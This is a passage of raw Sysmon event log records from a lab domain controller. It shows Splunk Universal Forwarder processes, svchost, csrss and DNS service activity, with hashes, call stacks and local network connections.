Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199937Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.971{5ABCFE62-E5D6-6040-CA4D-00000000AD01}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199936Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.845{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=568677EF49AA01BDC419CC7899CFB7B4,SHA256=4B23215EBE5A2FE083CE322374269B6FB825CF5FA05E4B9BFD3A0F0E49B03338,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199935Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.627{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17FDF8231BC00C5199B7D6DED29E237A,SHA256=B7528514603340607C6DE6568DEDF915492BF8A4D4639622653825D1A9E055BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199934Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.423{5ABCFE62-E5D6-6040-C94D-00000000AD01}67885628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199933Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.298{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E5D6-6040-C94D-00000000AD01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199932Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.298{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199931Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.298{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199930Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.298{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199929Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.298{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199928Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.298{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E5D6-6040-C94D-00000000AD01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199927Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.298{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E5D6-6040-C94D-00000000AD01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199926Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:18.299{5ABCFE62-E5D6-6040-C94D-00000000AD01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002199955Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.767{5ABCFE62-E5D7-6040-CB4D-00000000AD01}6928892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199954Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E5D7-6040-CB4D-00000000AD01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199953Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199952Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199951Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199950Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199949Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E5D7-6040-CB4D-00000000AD01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199948Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E5D7-6040-CB4D-00000000AD01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199947Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.643{5ABCFE62-E5D7-6040-CB4D-00000000AD01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199946Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:19.642{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFD1BE61B4783776BC09777728492430,SHA256=97E6D0145B93FD42FD97D8DF0A34B156B1BC406CCD9BD92F9D7BCFE9F4F5CA1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199945Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:15.621{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local64058- 23542300x80000000000000002199958Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:20.658{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C416EDCC17B34F64A4FF3FF1AC6FDC66,SHA256=2F0C22F6BE83C9312CBE78EC05704C980EACA5CA70B535BD83399E35A93840A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199957Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:16.637{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64058- 23542300x80000000000000002199956Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:20.002{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1249578A291423DD021C218BD1C2A7FC,SHA256=60F72DA98541F7D11DD88366716CE9BF138CA3196EBE460CFD29584C461EED37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199960Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:21.673{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AD88A78D619CCADDDF5CC7B6768B36D,SHA256=F30AE46A20B4B5226F043EC68E799E7DA1435DAA9A3FC99CFA3F5DB919FD9567,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199959Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:17.012{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55087-false10.0.1.12-8000- 23542300x80000000000000002199962Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:22.689{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=191F3BC75398D91C32AAF9362B7373AD,SHA256=5697F1AA2ED0D97DF74EC603B713903E1D28D948F211FE100A8E3B4B3080A7F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199961Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:22.189{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=63CF4C93EF7A14BC860E0A404A9A9A78,SHA256=76D4120551E7C61AF5D05C698FAC7D44621C18BC04E35138267CEF35E8B74E2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199964Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:23.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1495AE587FA737D83BC3C90E0C3D541,SHA256=2BCB890CB7BAA6A18A2495205BB0199448CB16773746B42831ADC85BAB8CB2FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199963Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:23.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF90D4D3FFC52F1F7536DBCD8E781EF0,SHA256=4F9921927B4E4BB81D6ABC46237C77D0AB6C4691A7BC033531F194376CD837AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199965Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:24.720{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EBC46D3DCA49B5152F532F2D861C838,SHA256=1F69FCD764DDD07E52DE8F21CF6E376CAF78CD875FF960B5B977D49938B60240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199967Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:25.736{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2EEC5B75C56020167FD5F6E73505A4D,SHA256=F6488F7BD56DE83984706E14B78C939C0C47D742E8200259FEBF2C47DCF28A58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199966Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:25.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92701A1ABE1057B399BA0FA4A07266F5,SHA256=273B998EA507223B98CECDFD857787F77C62E008E9553F60E328005D791E184E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199970Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:26.861{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9F60649125642AF89DCE138552EABB1,SHA256=2C21224213BC12144E8737120BF1BE11988AEC75A478060AC79B26C11F18349D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199969Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:26.752{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 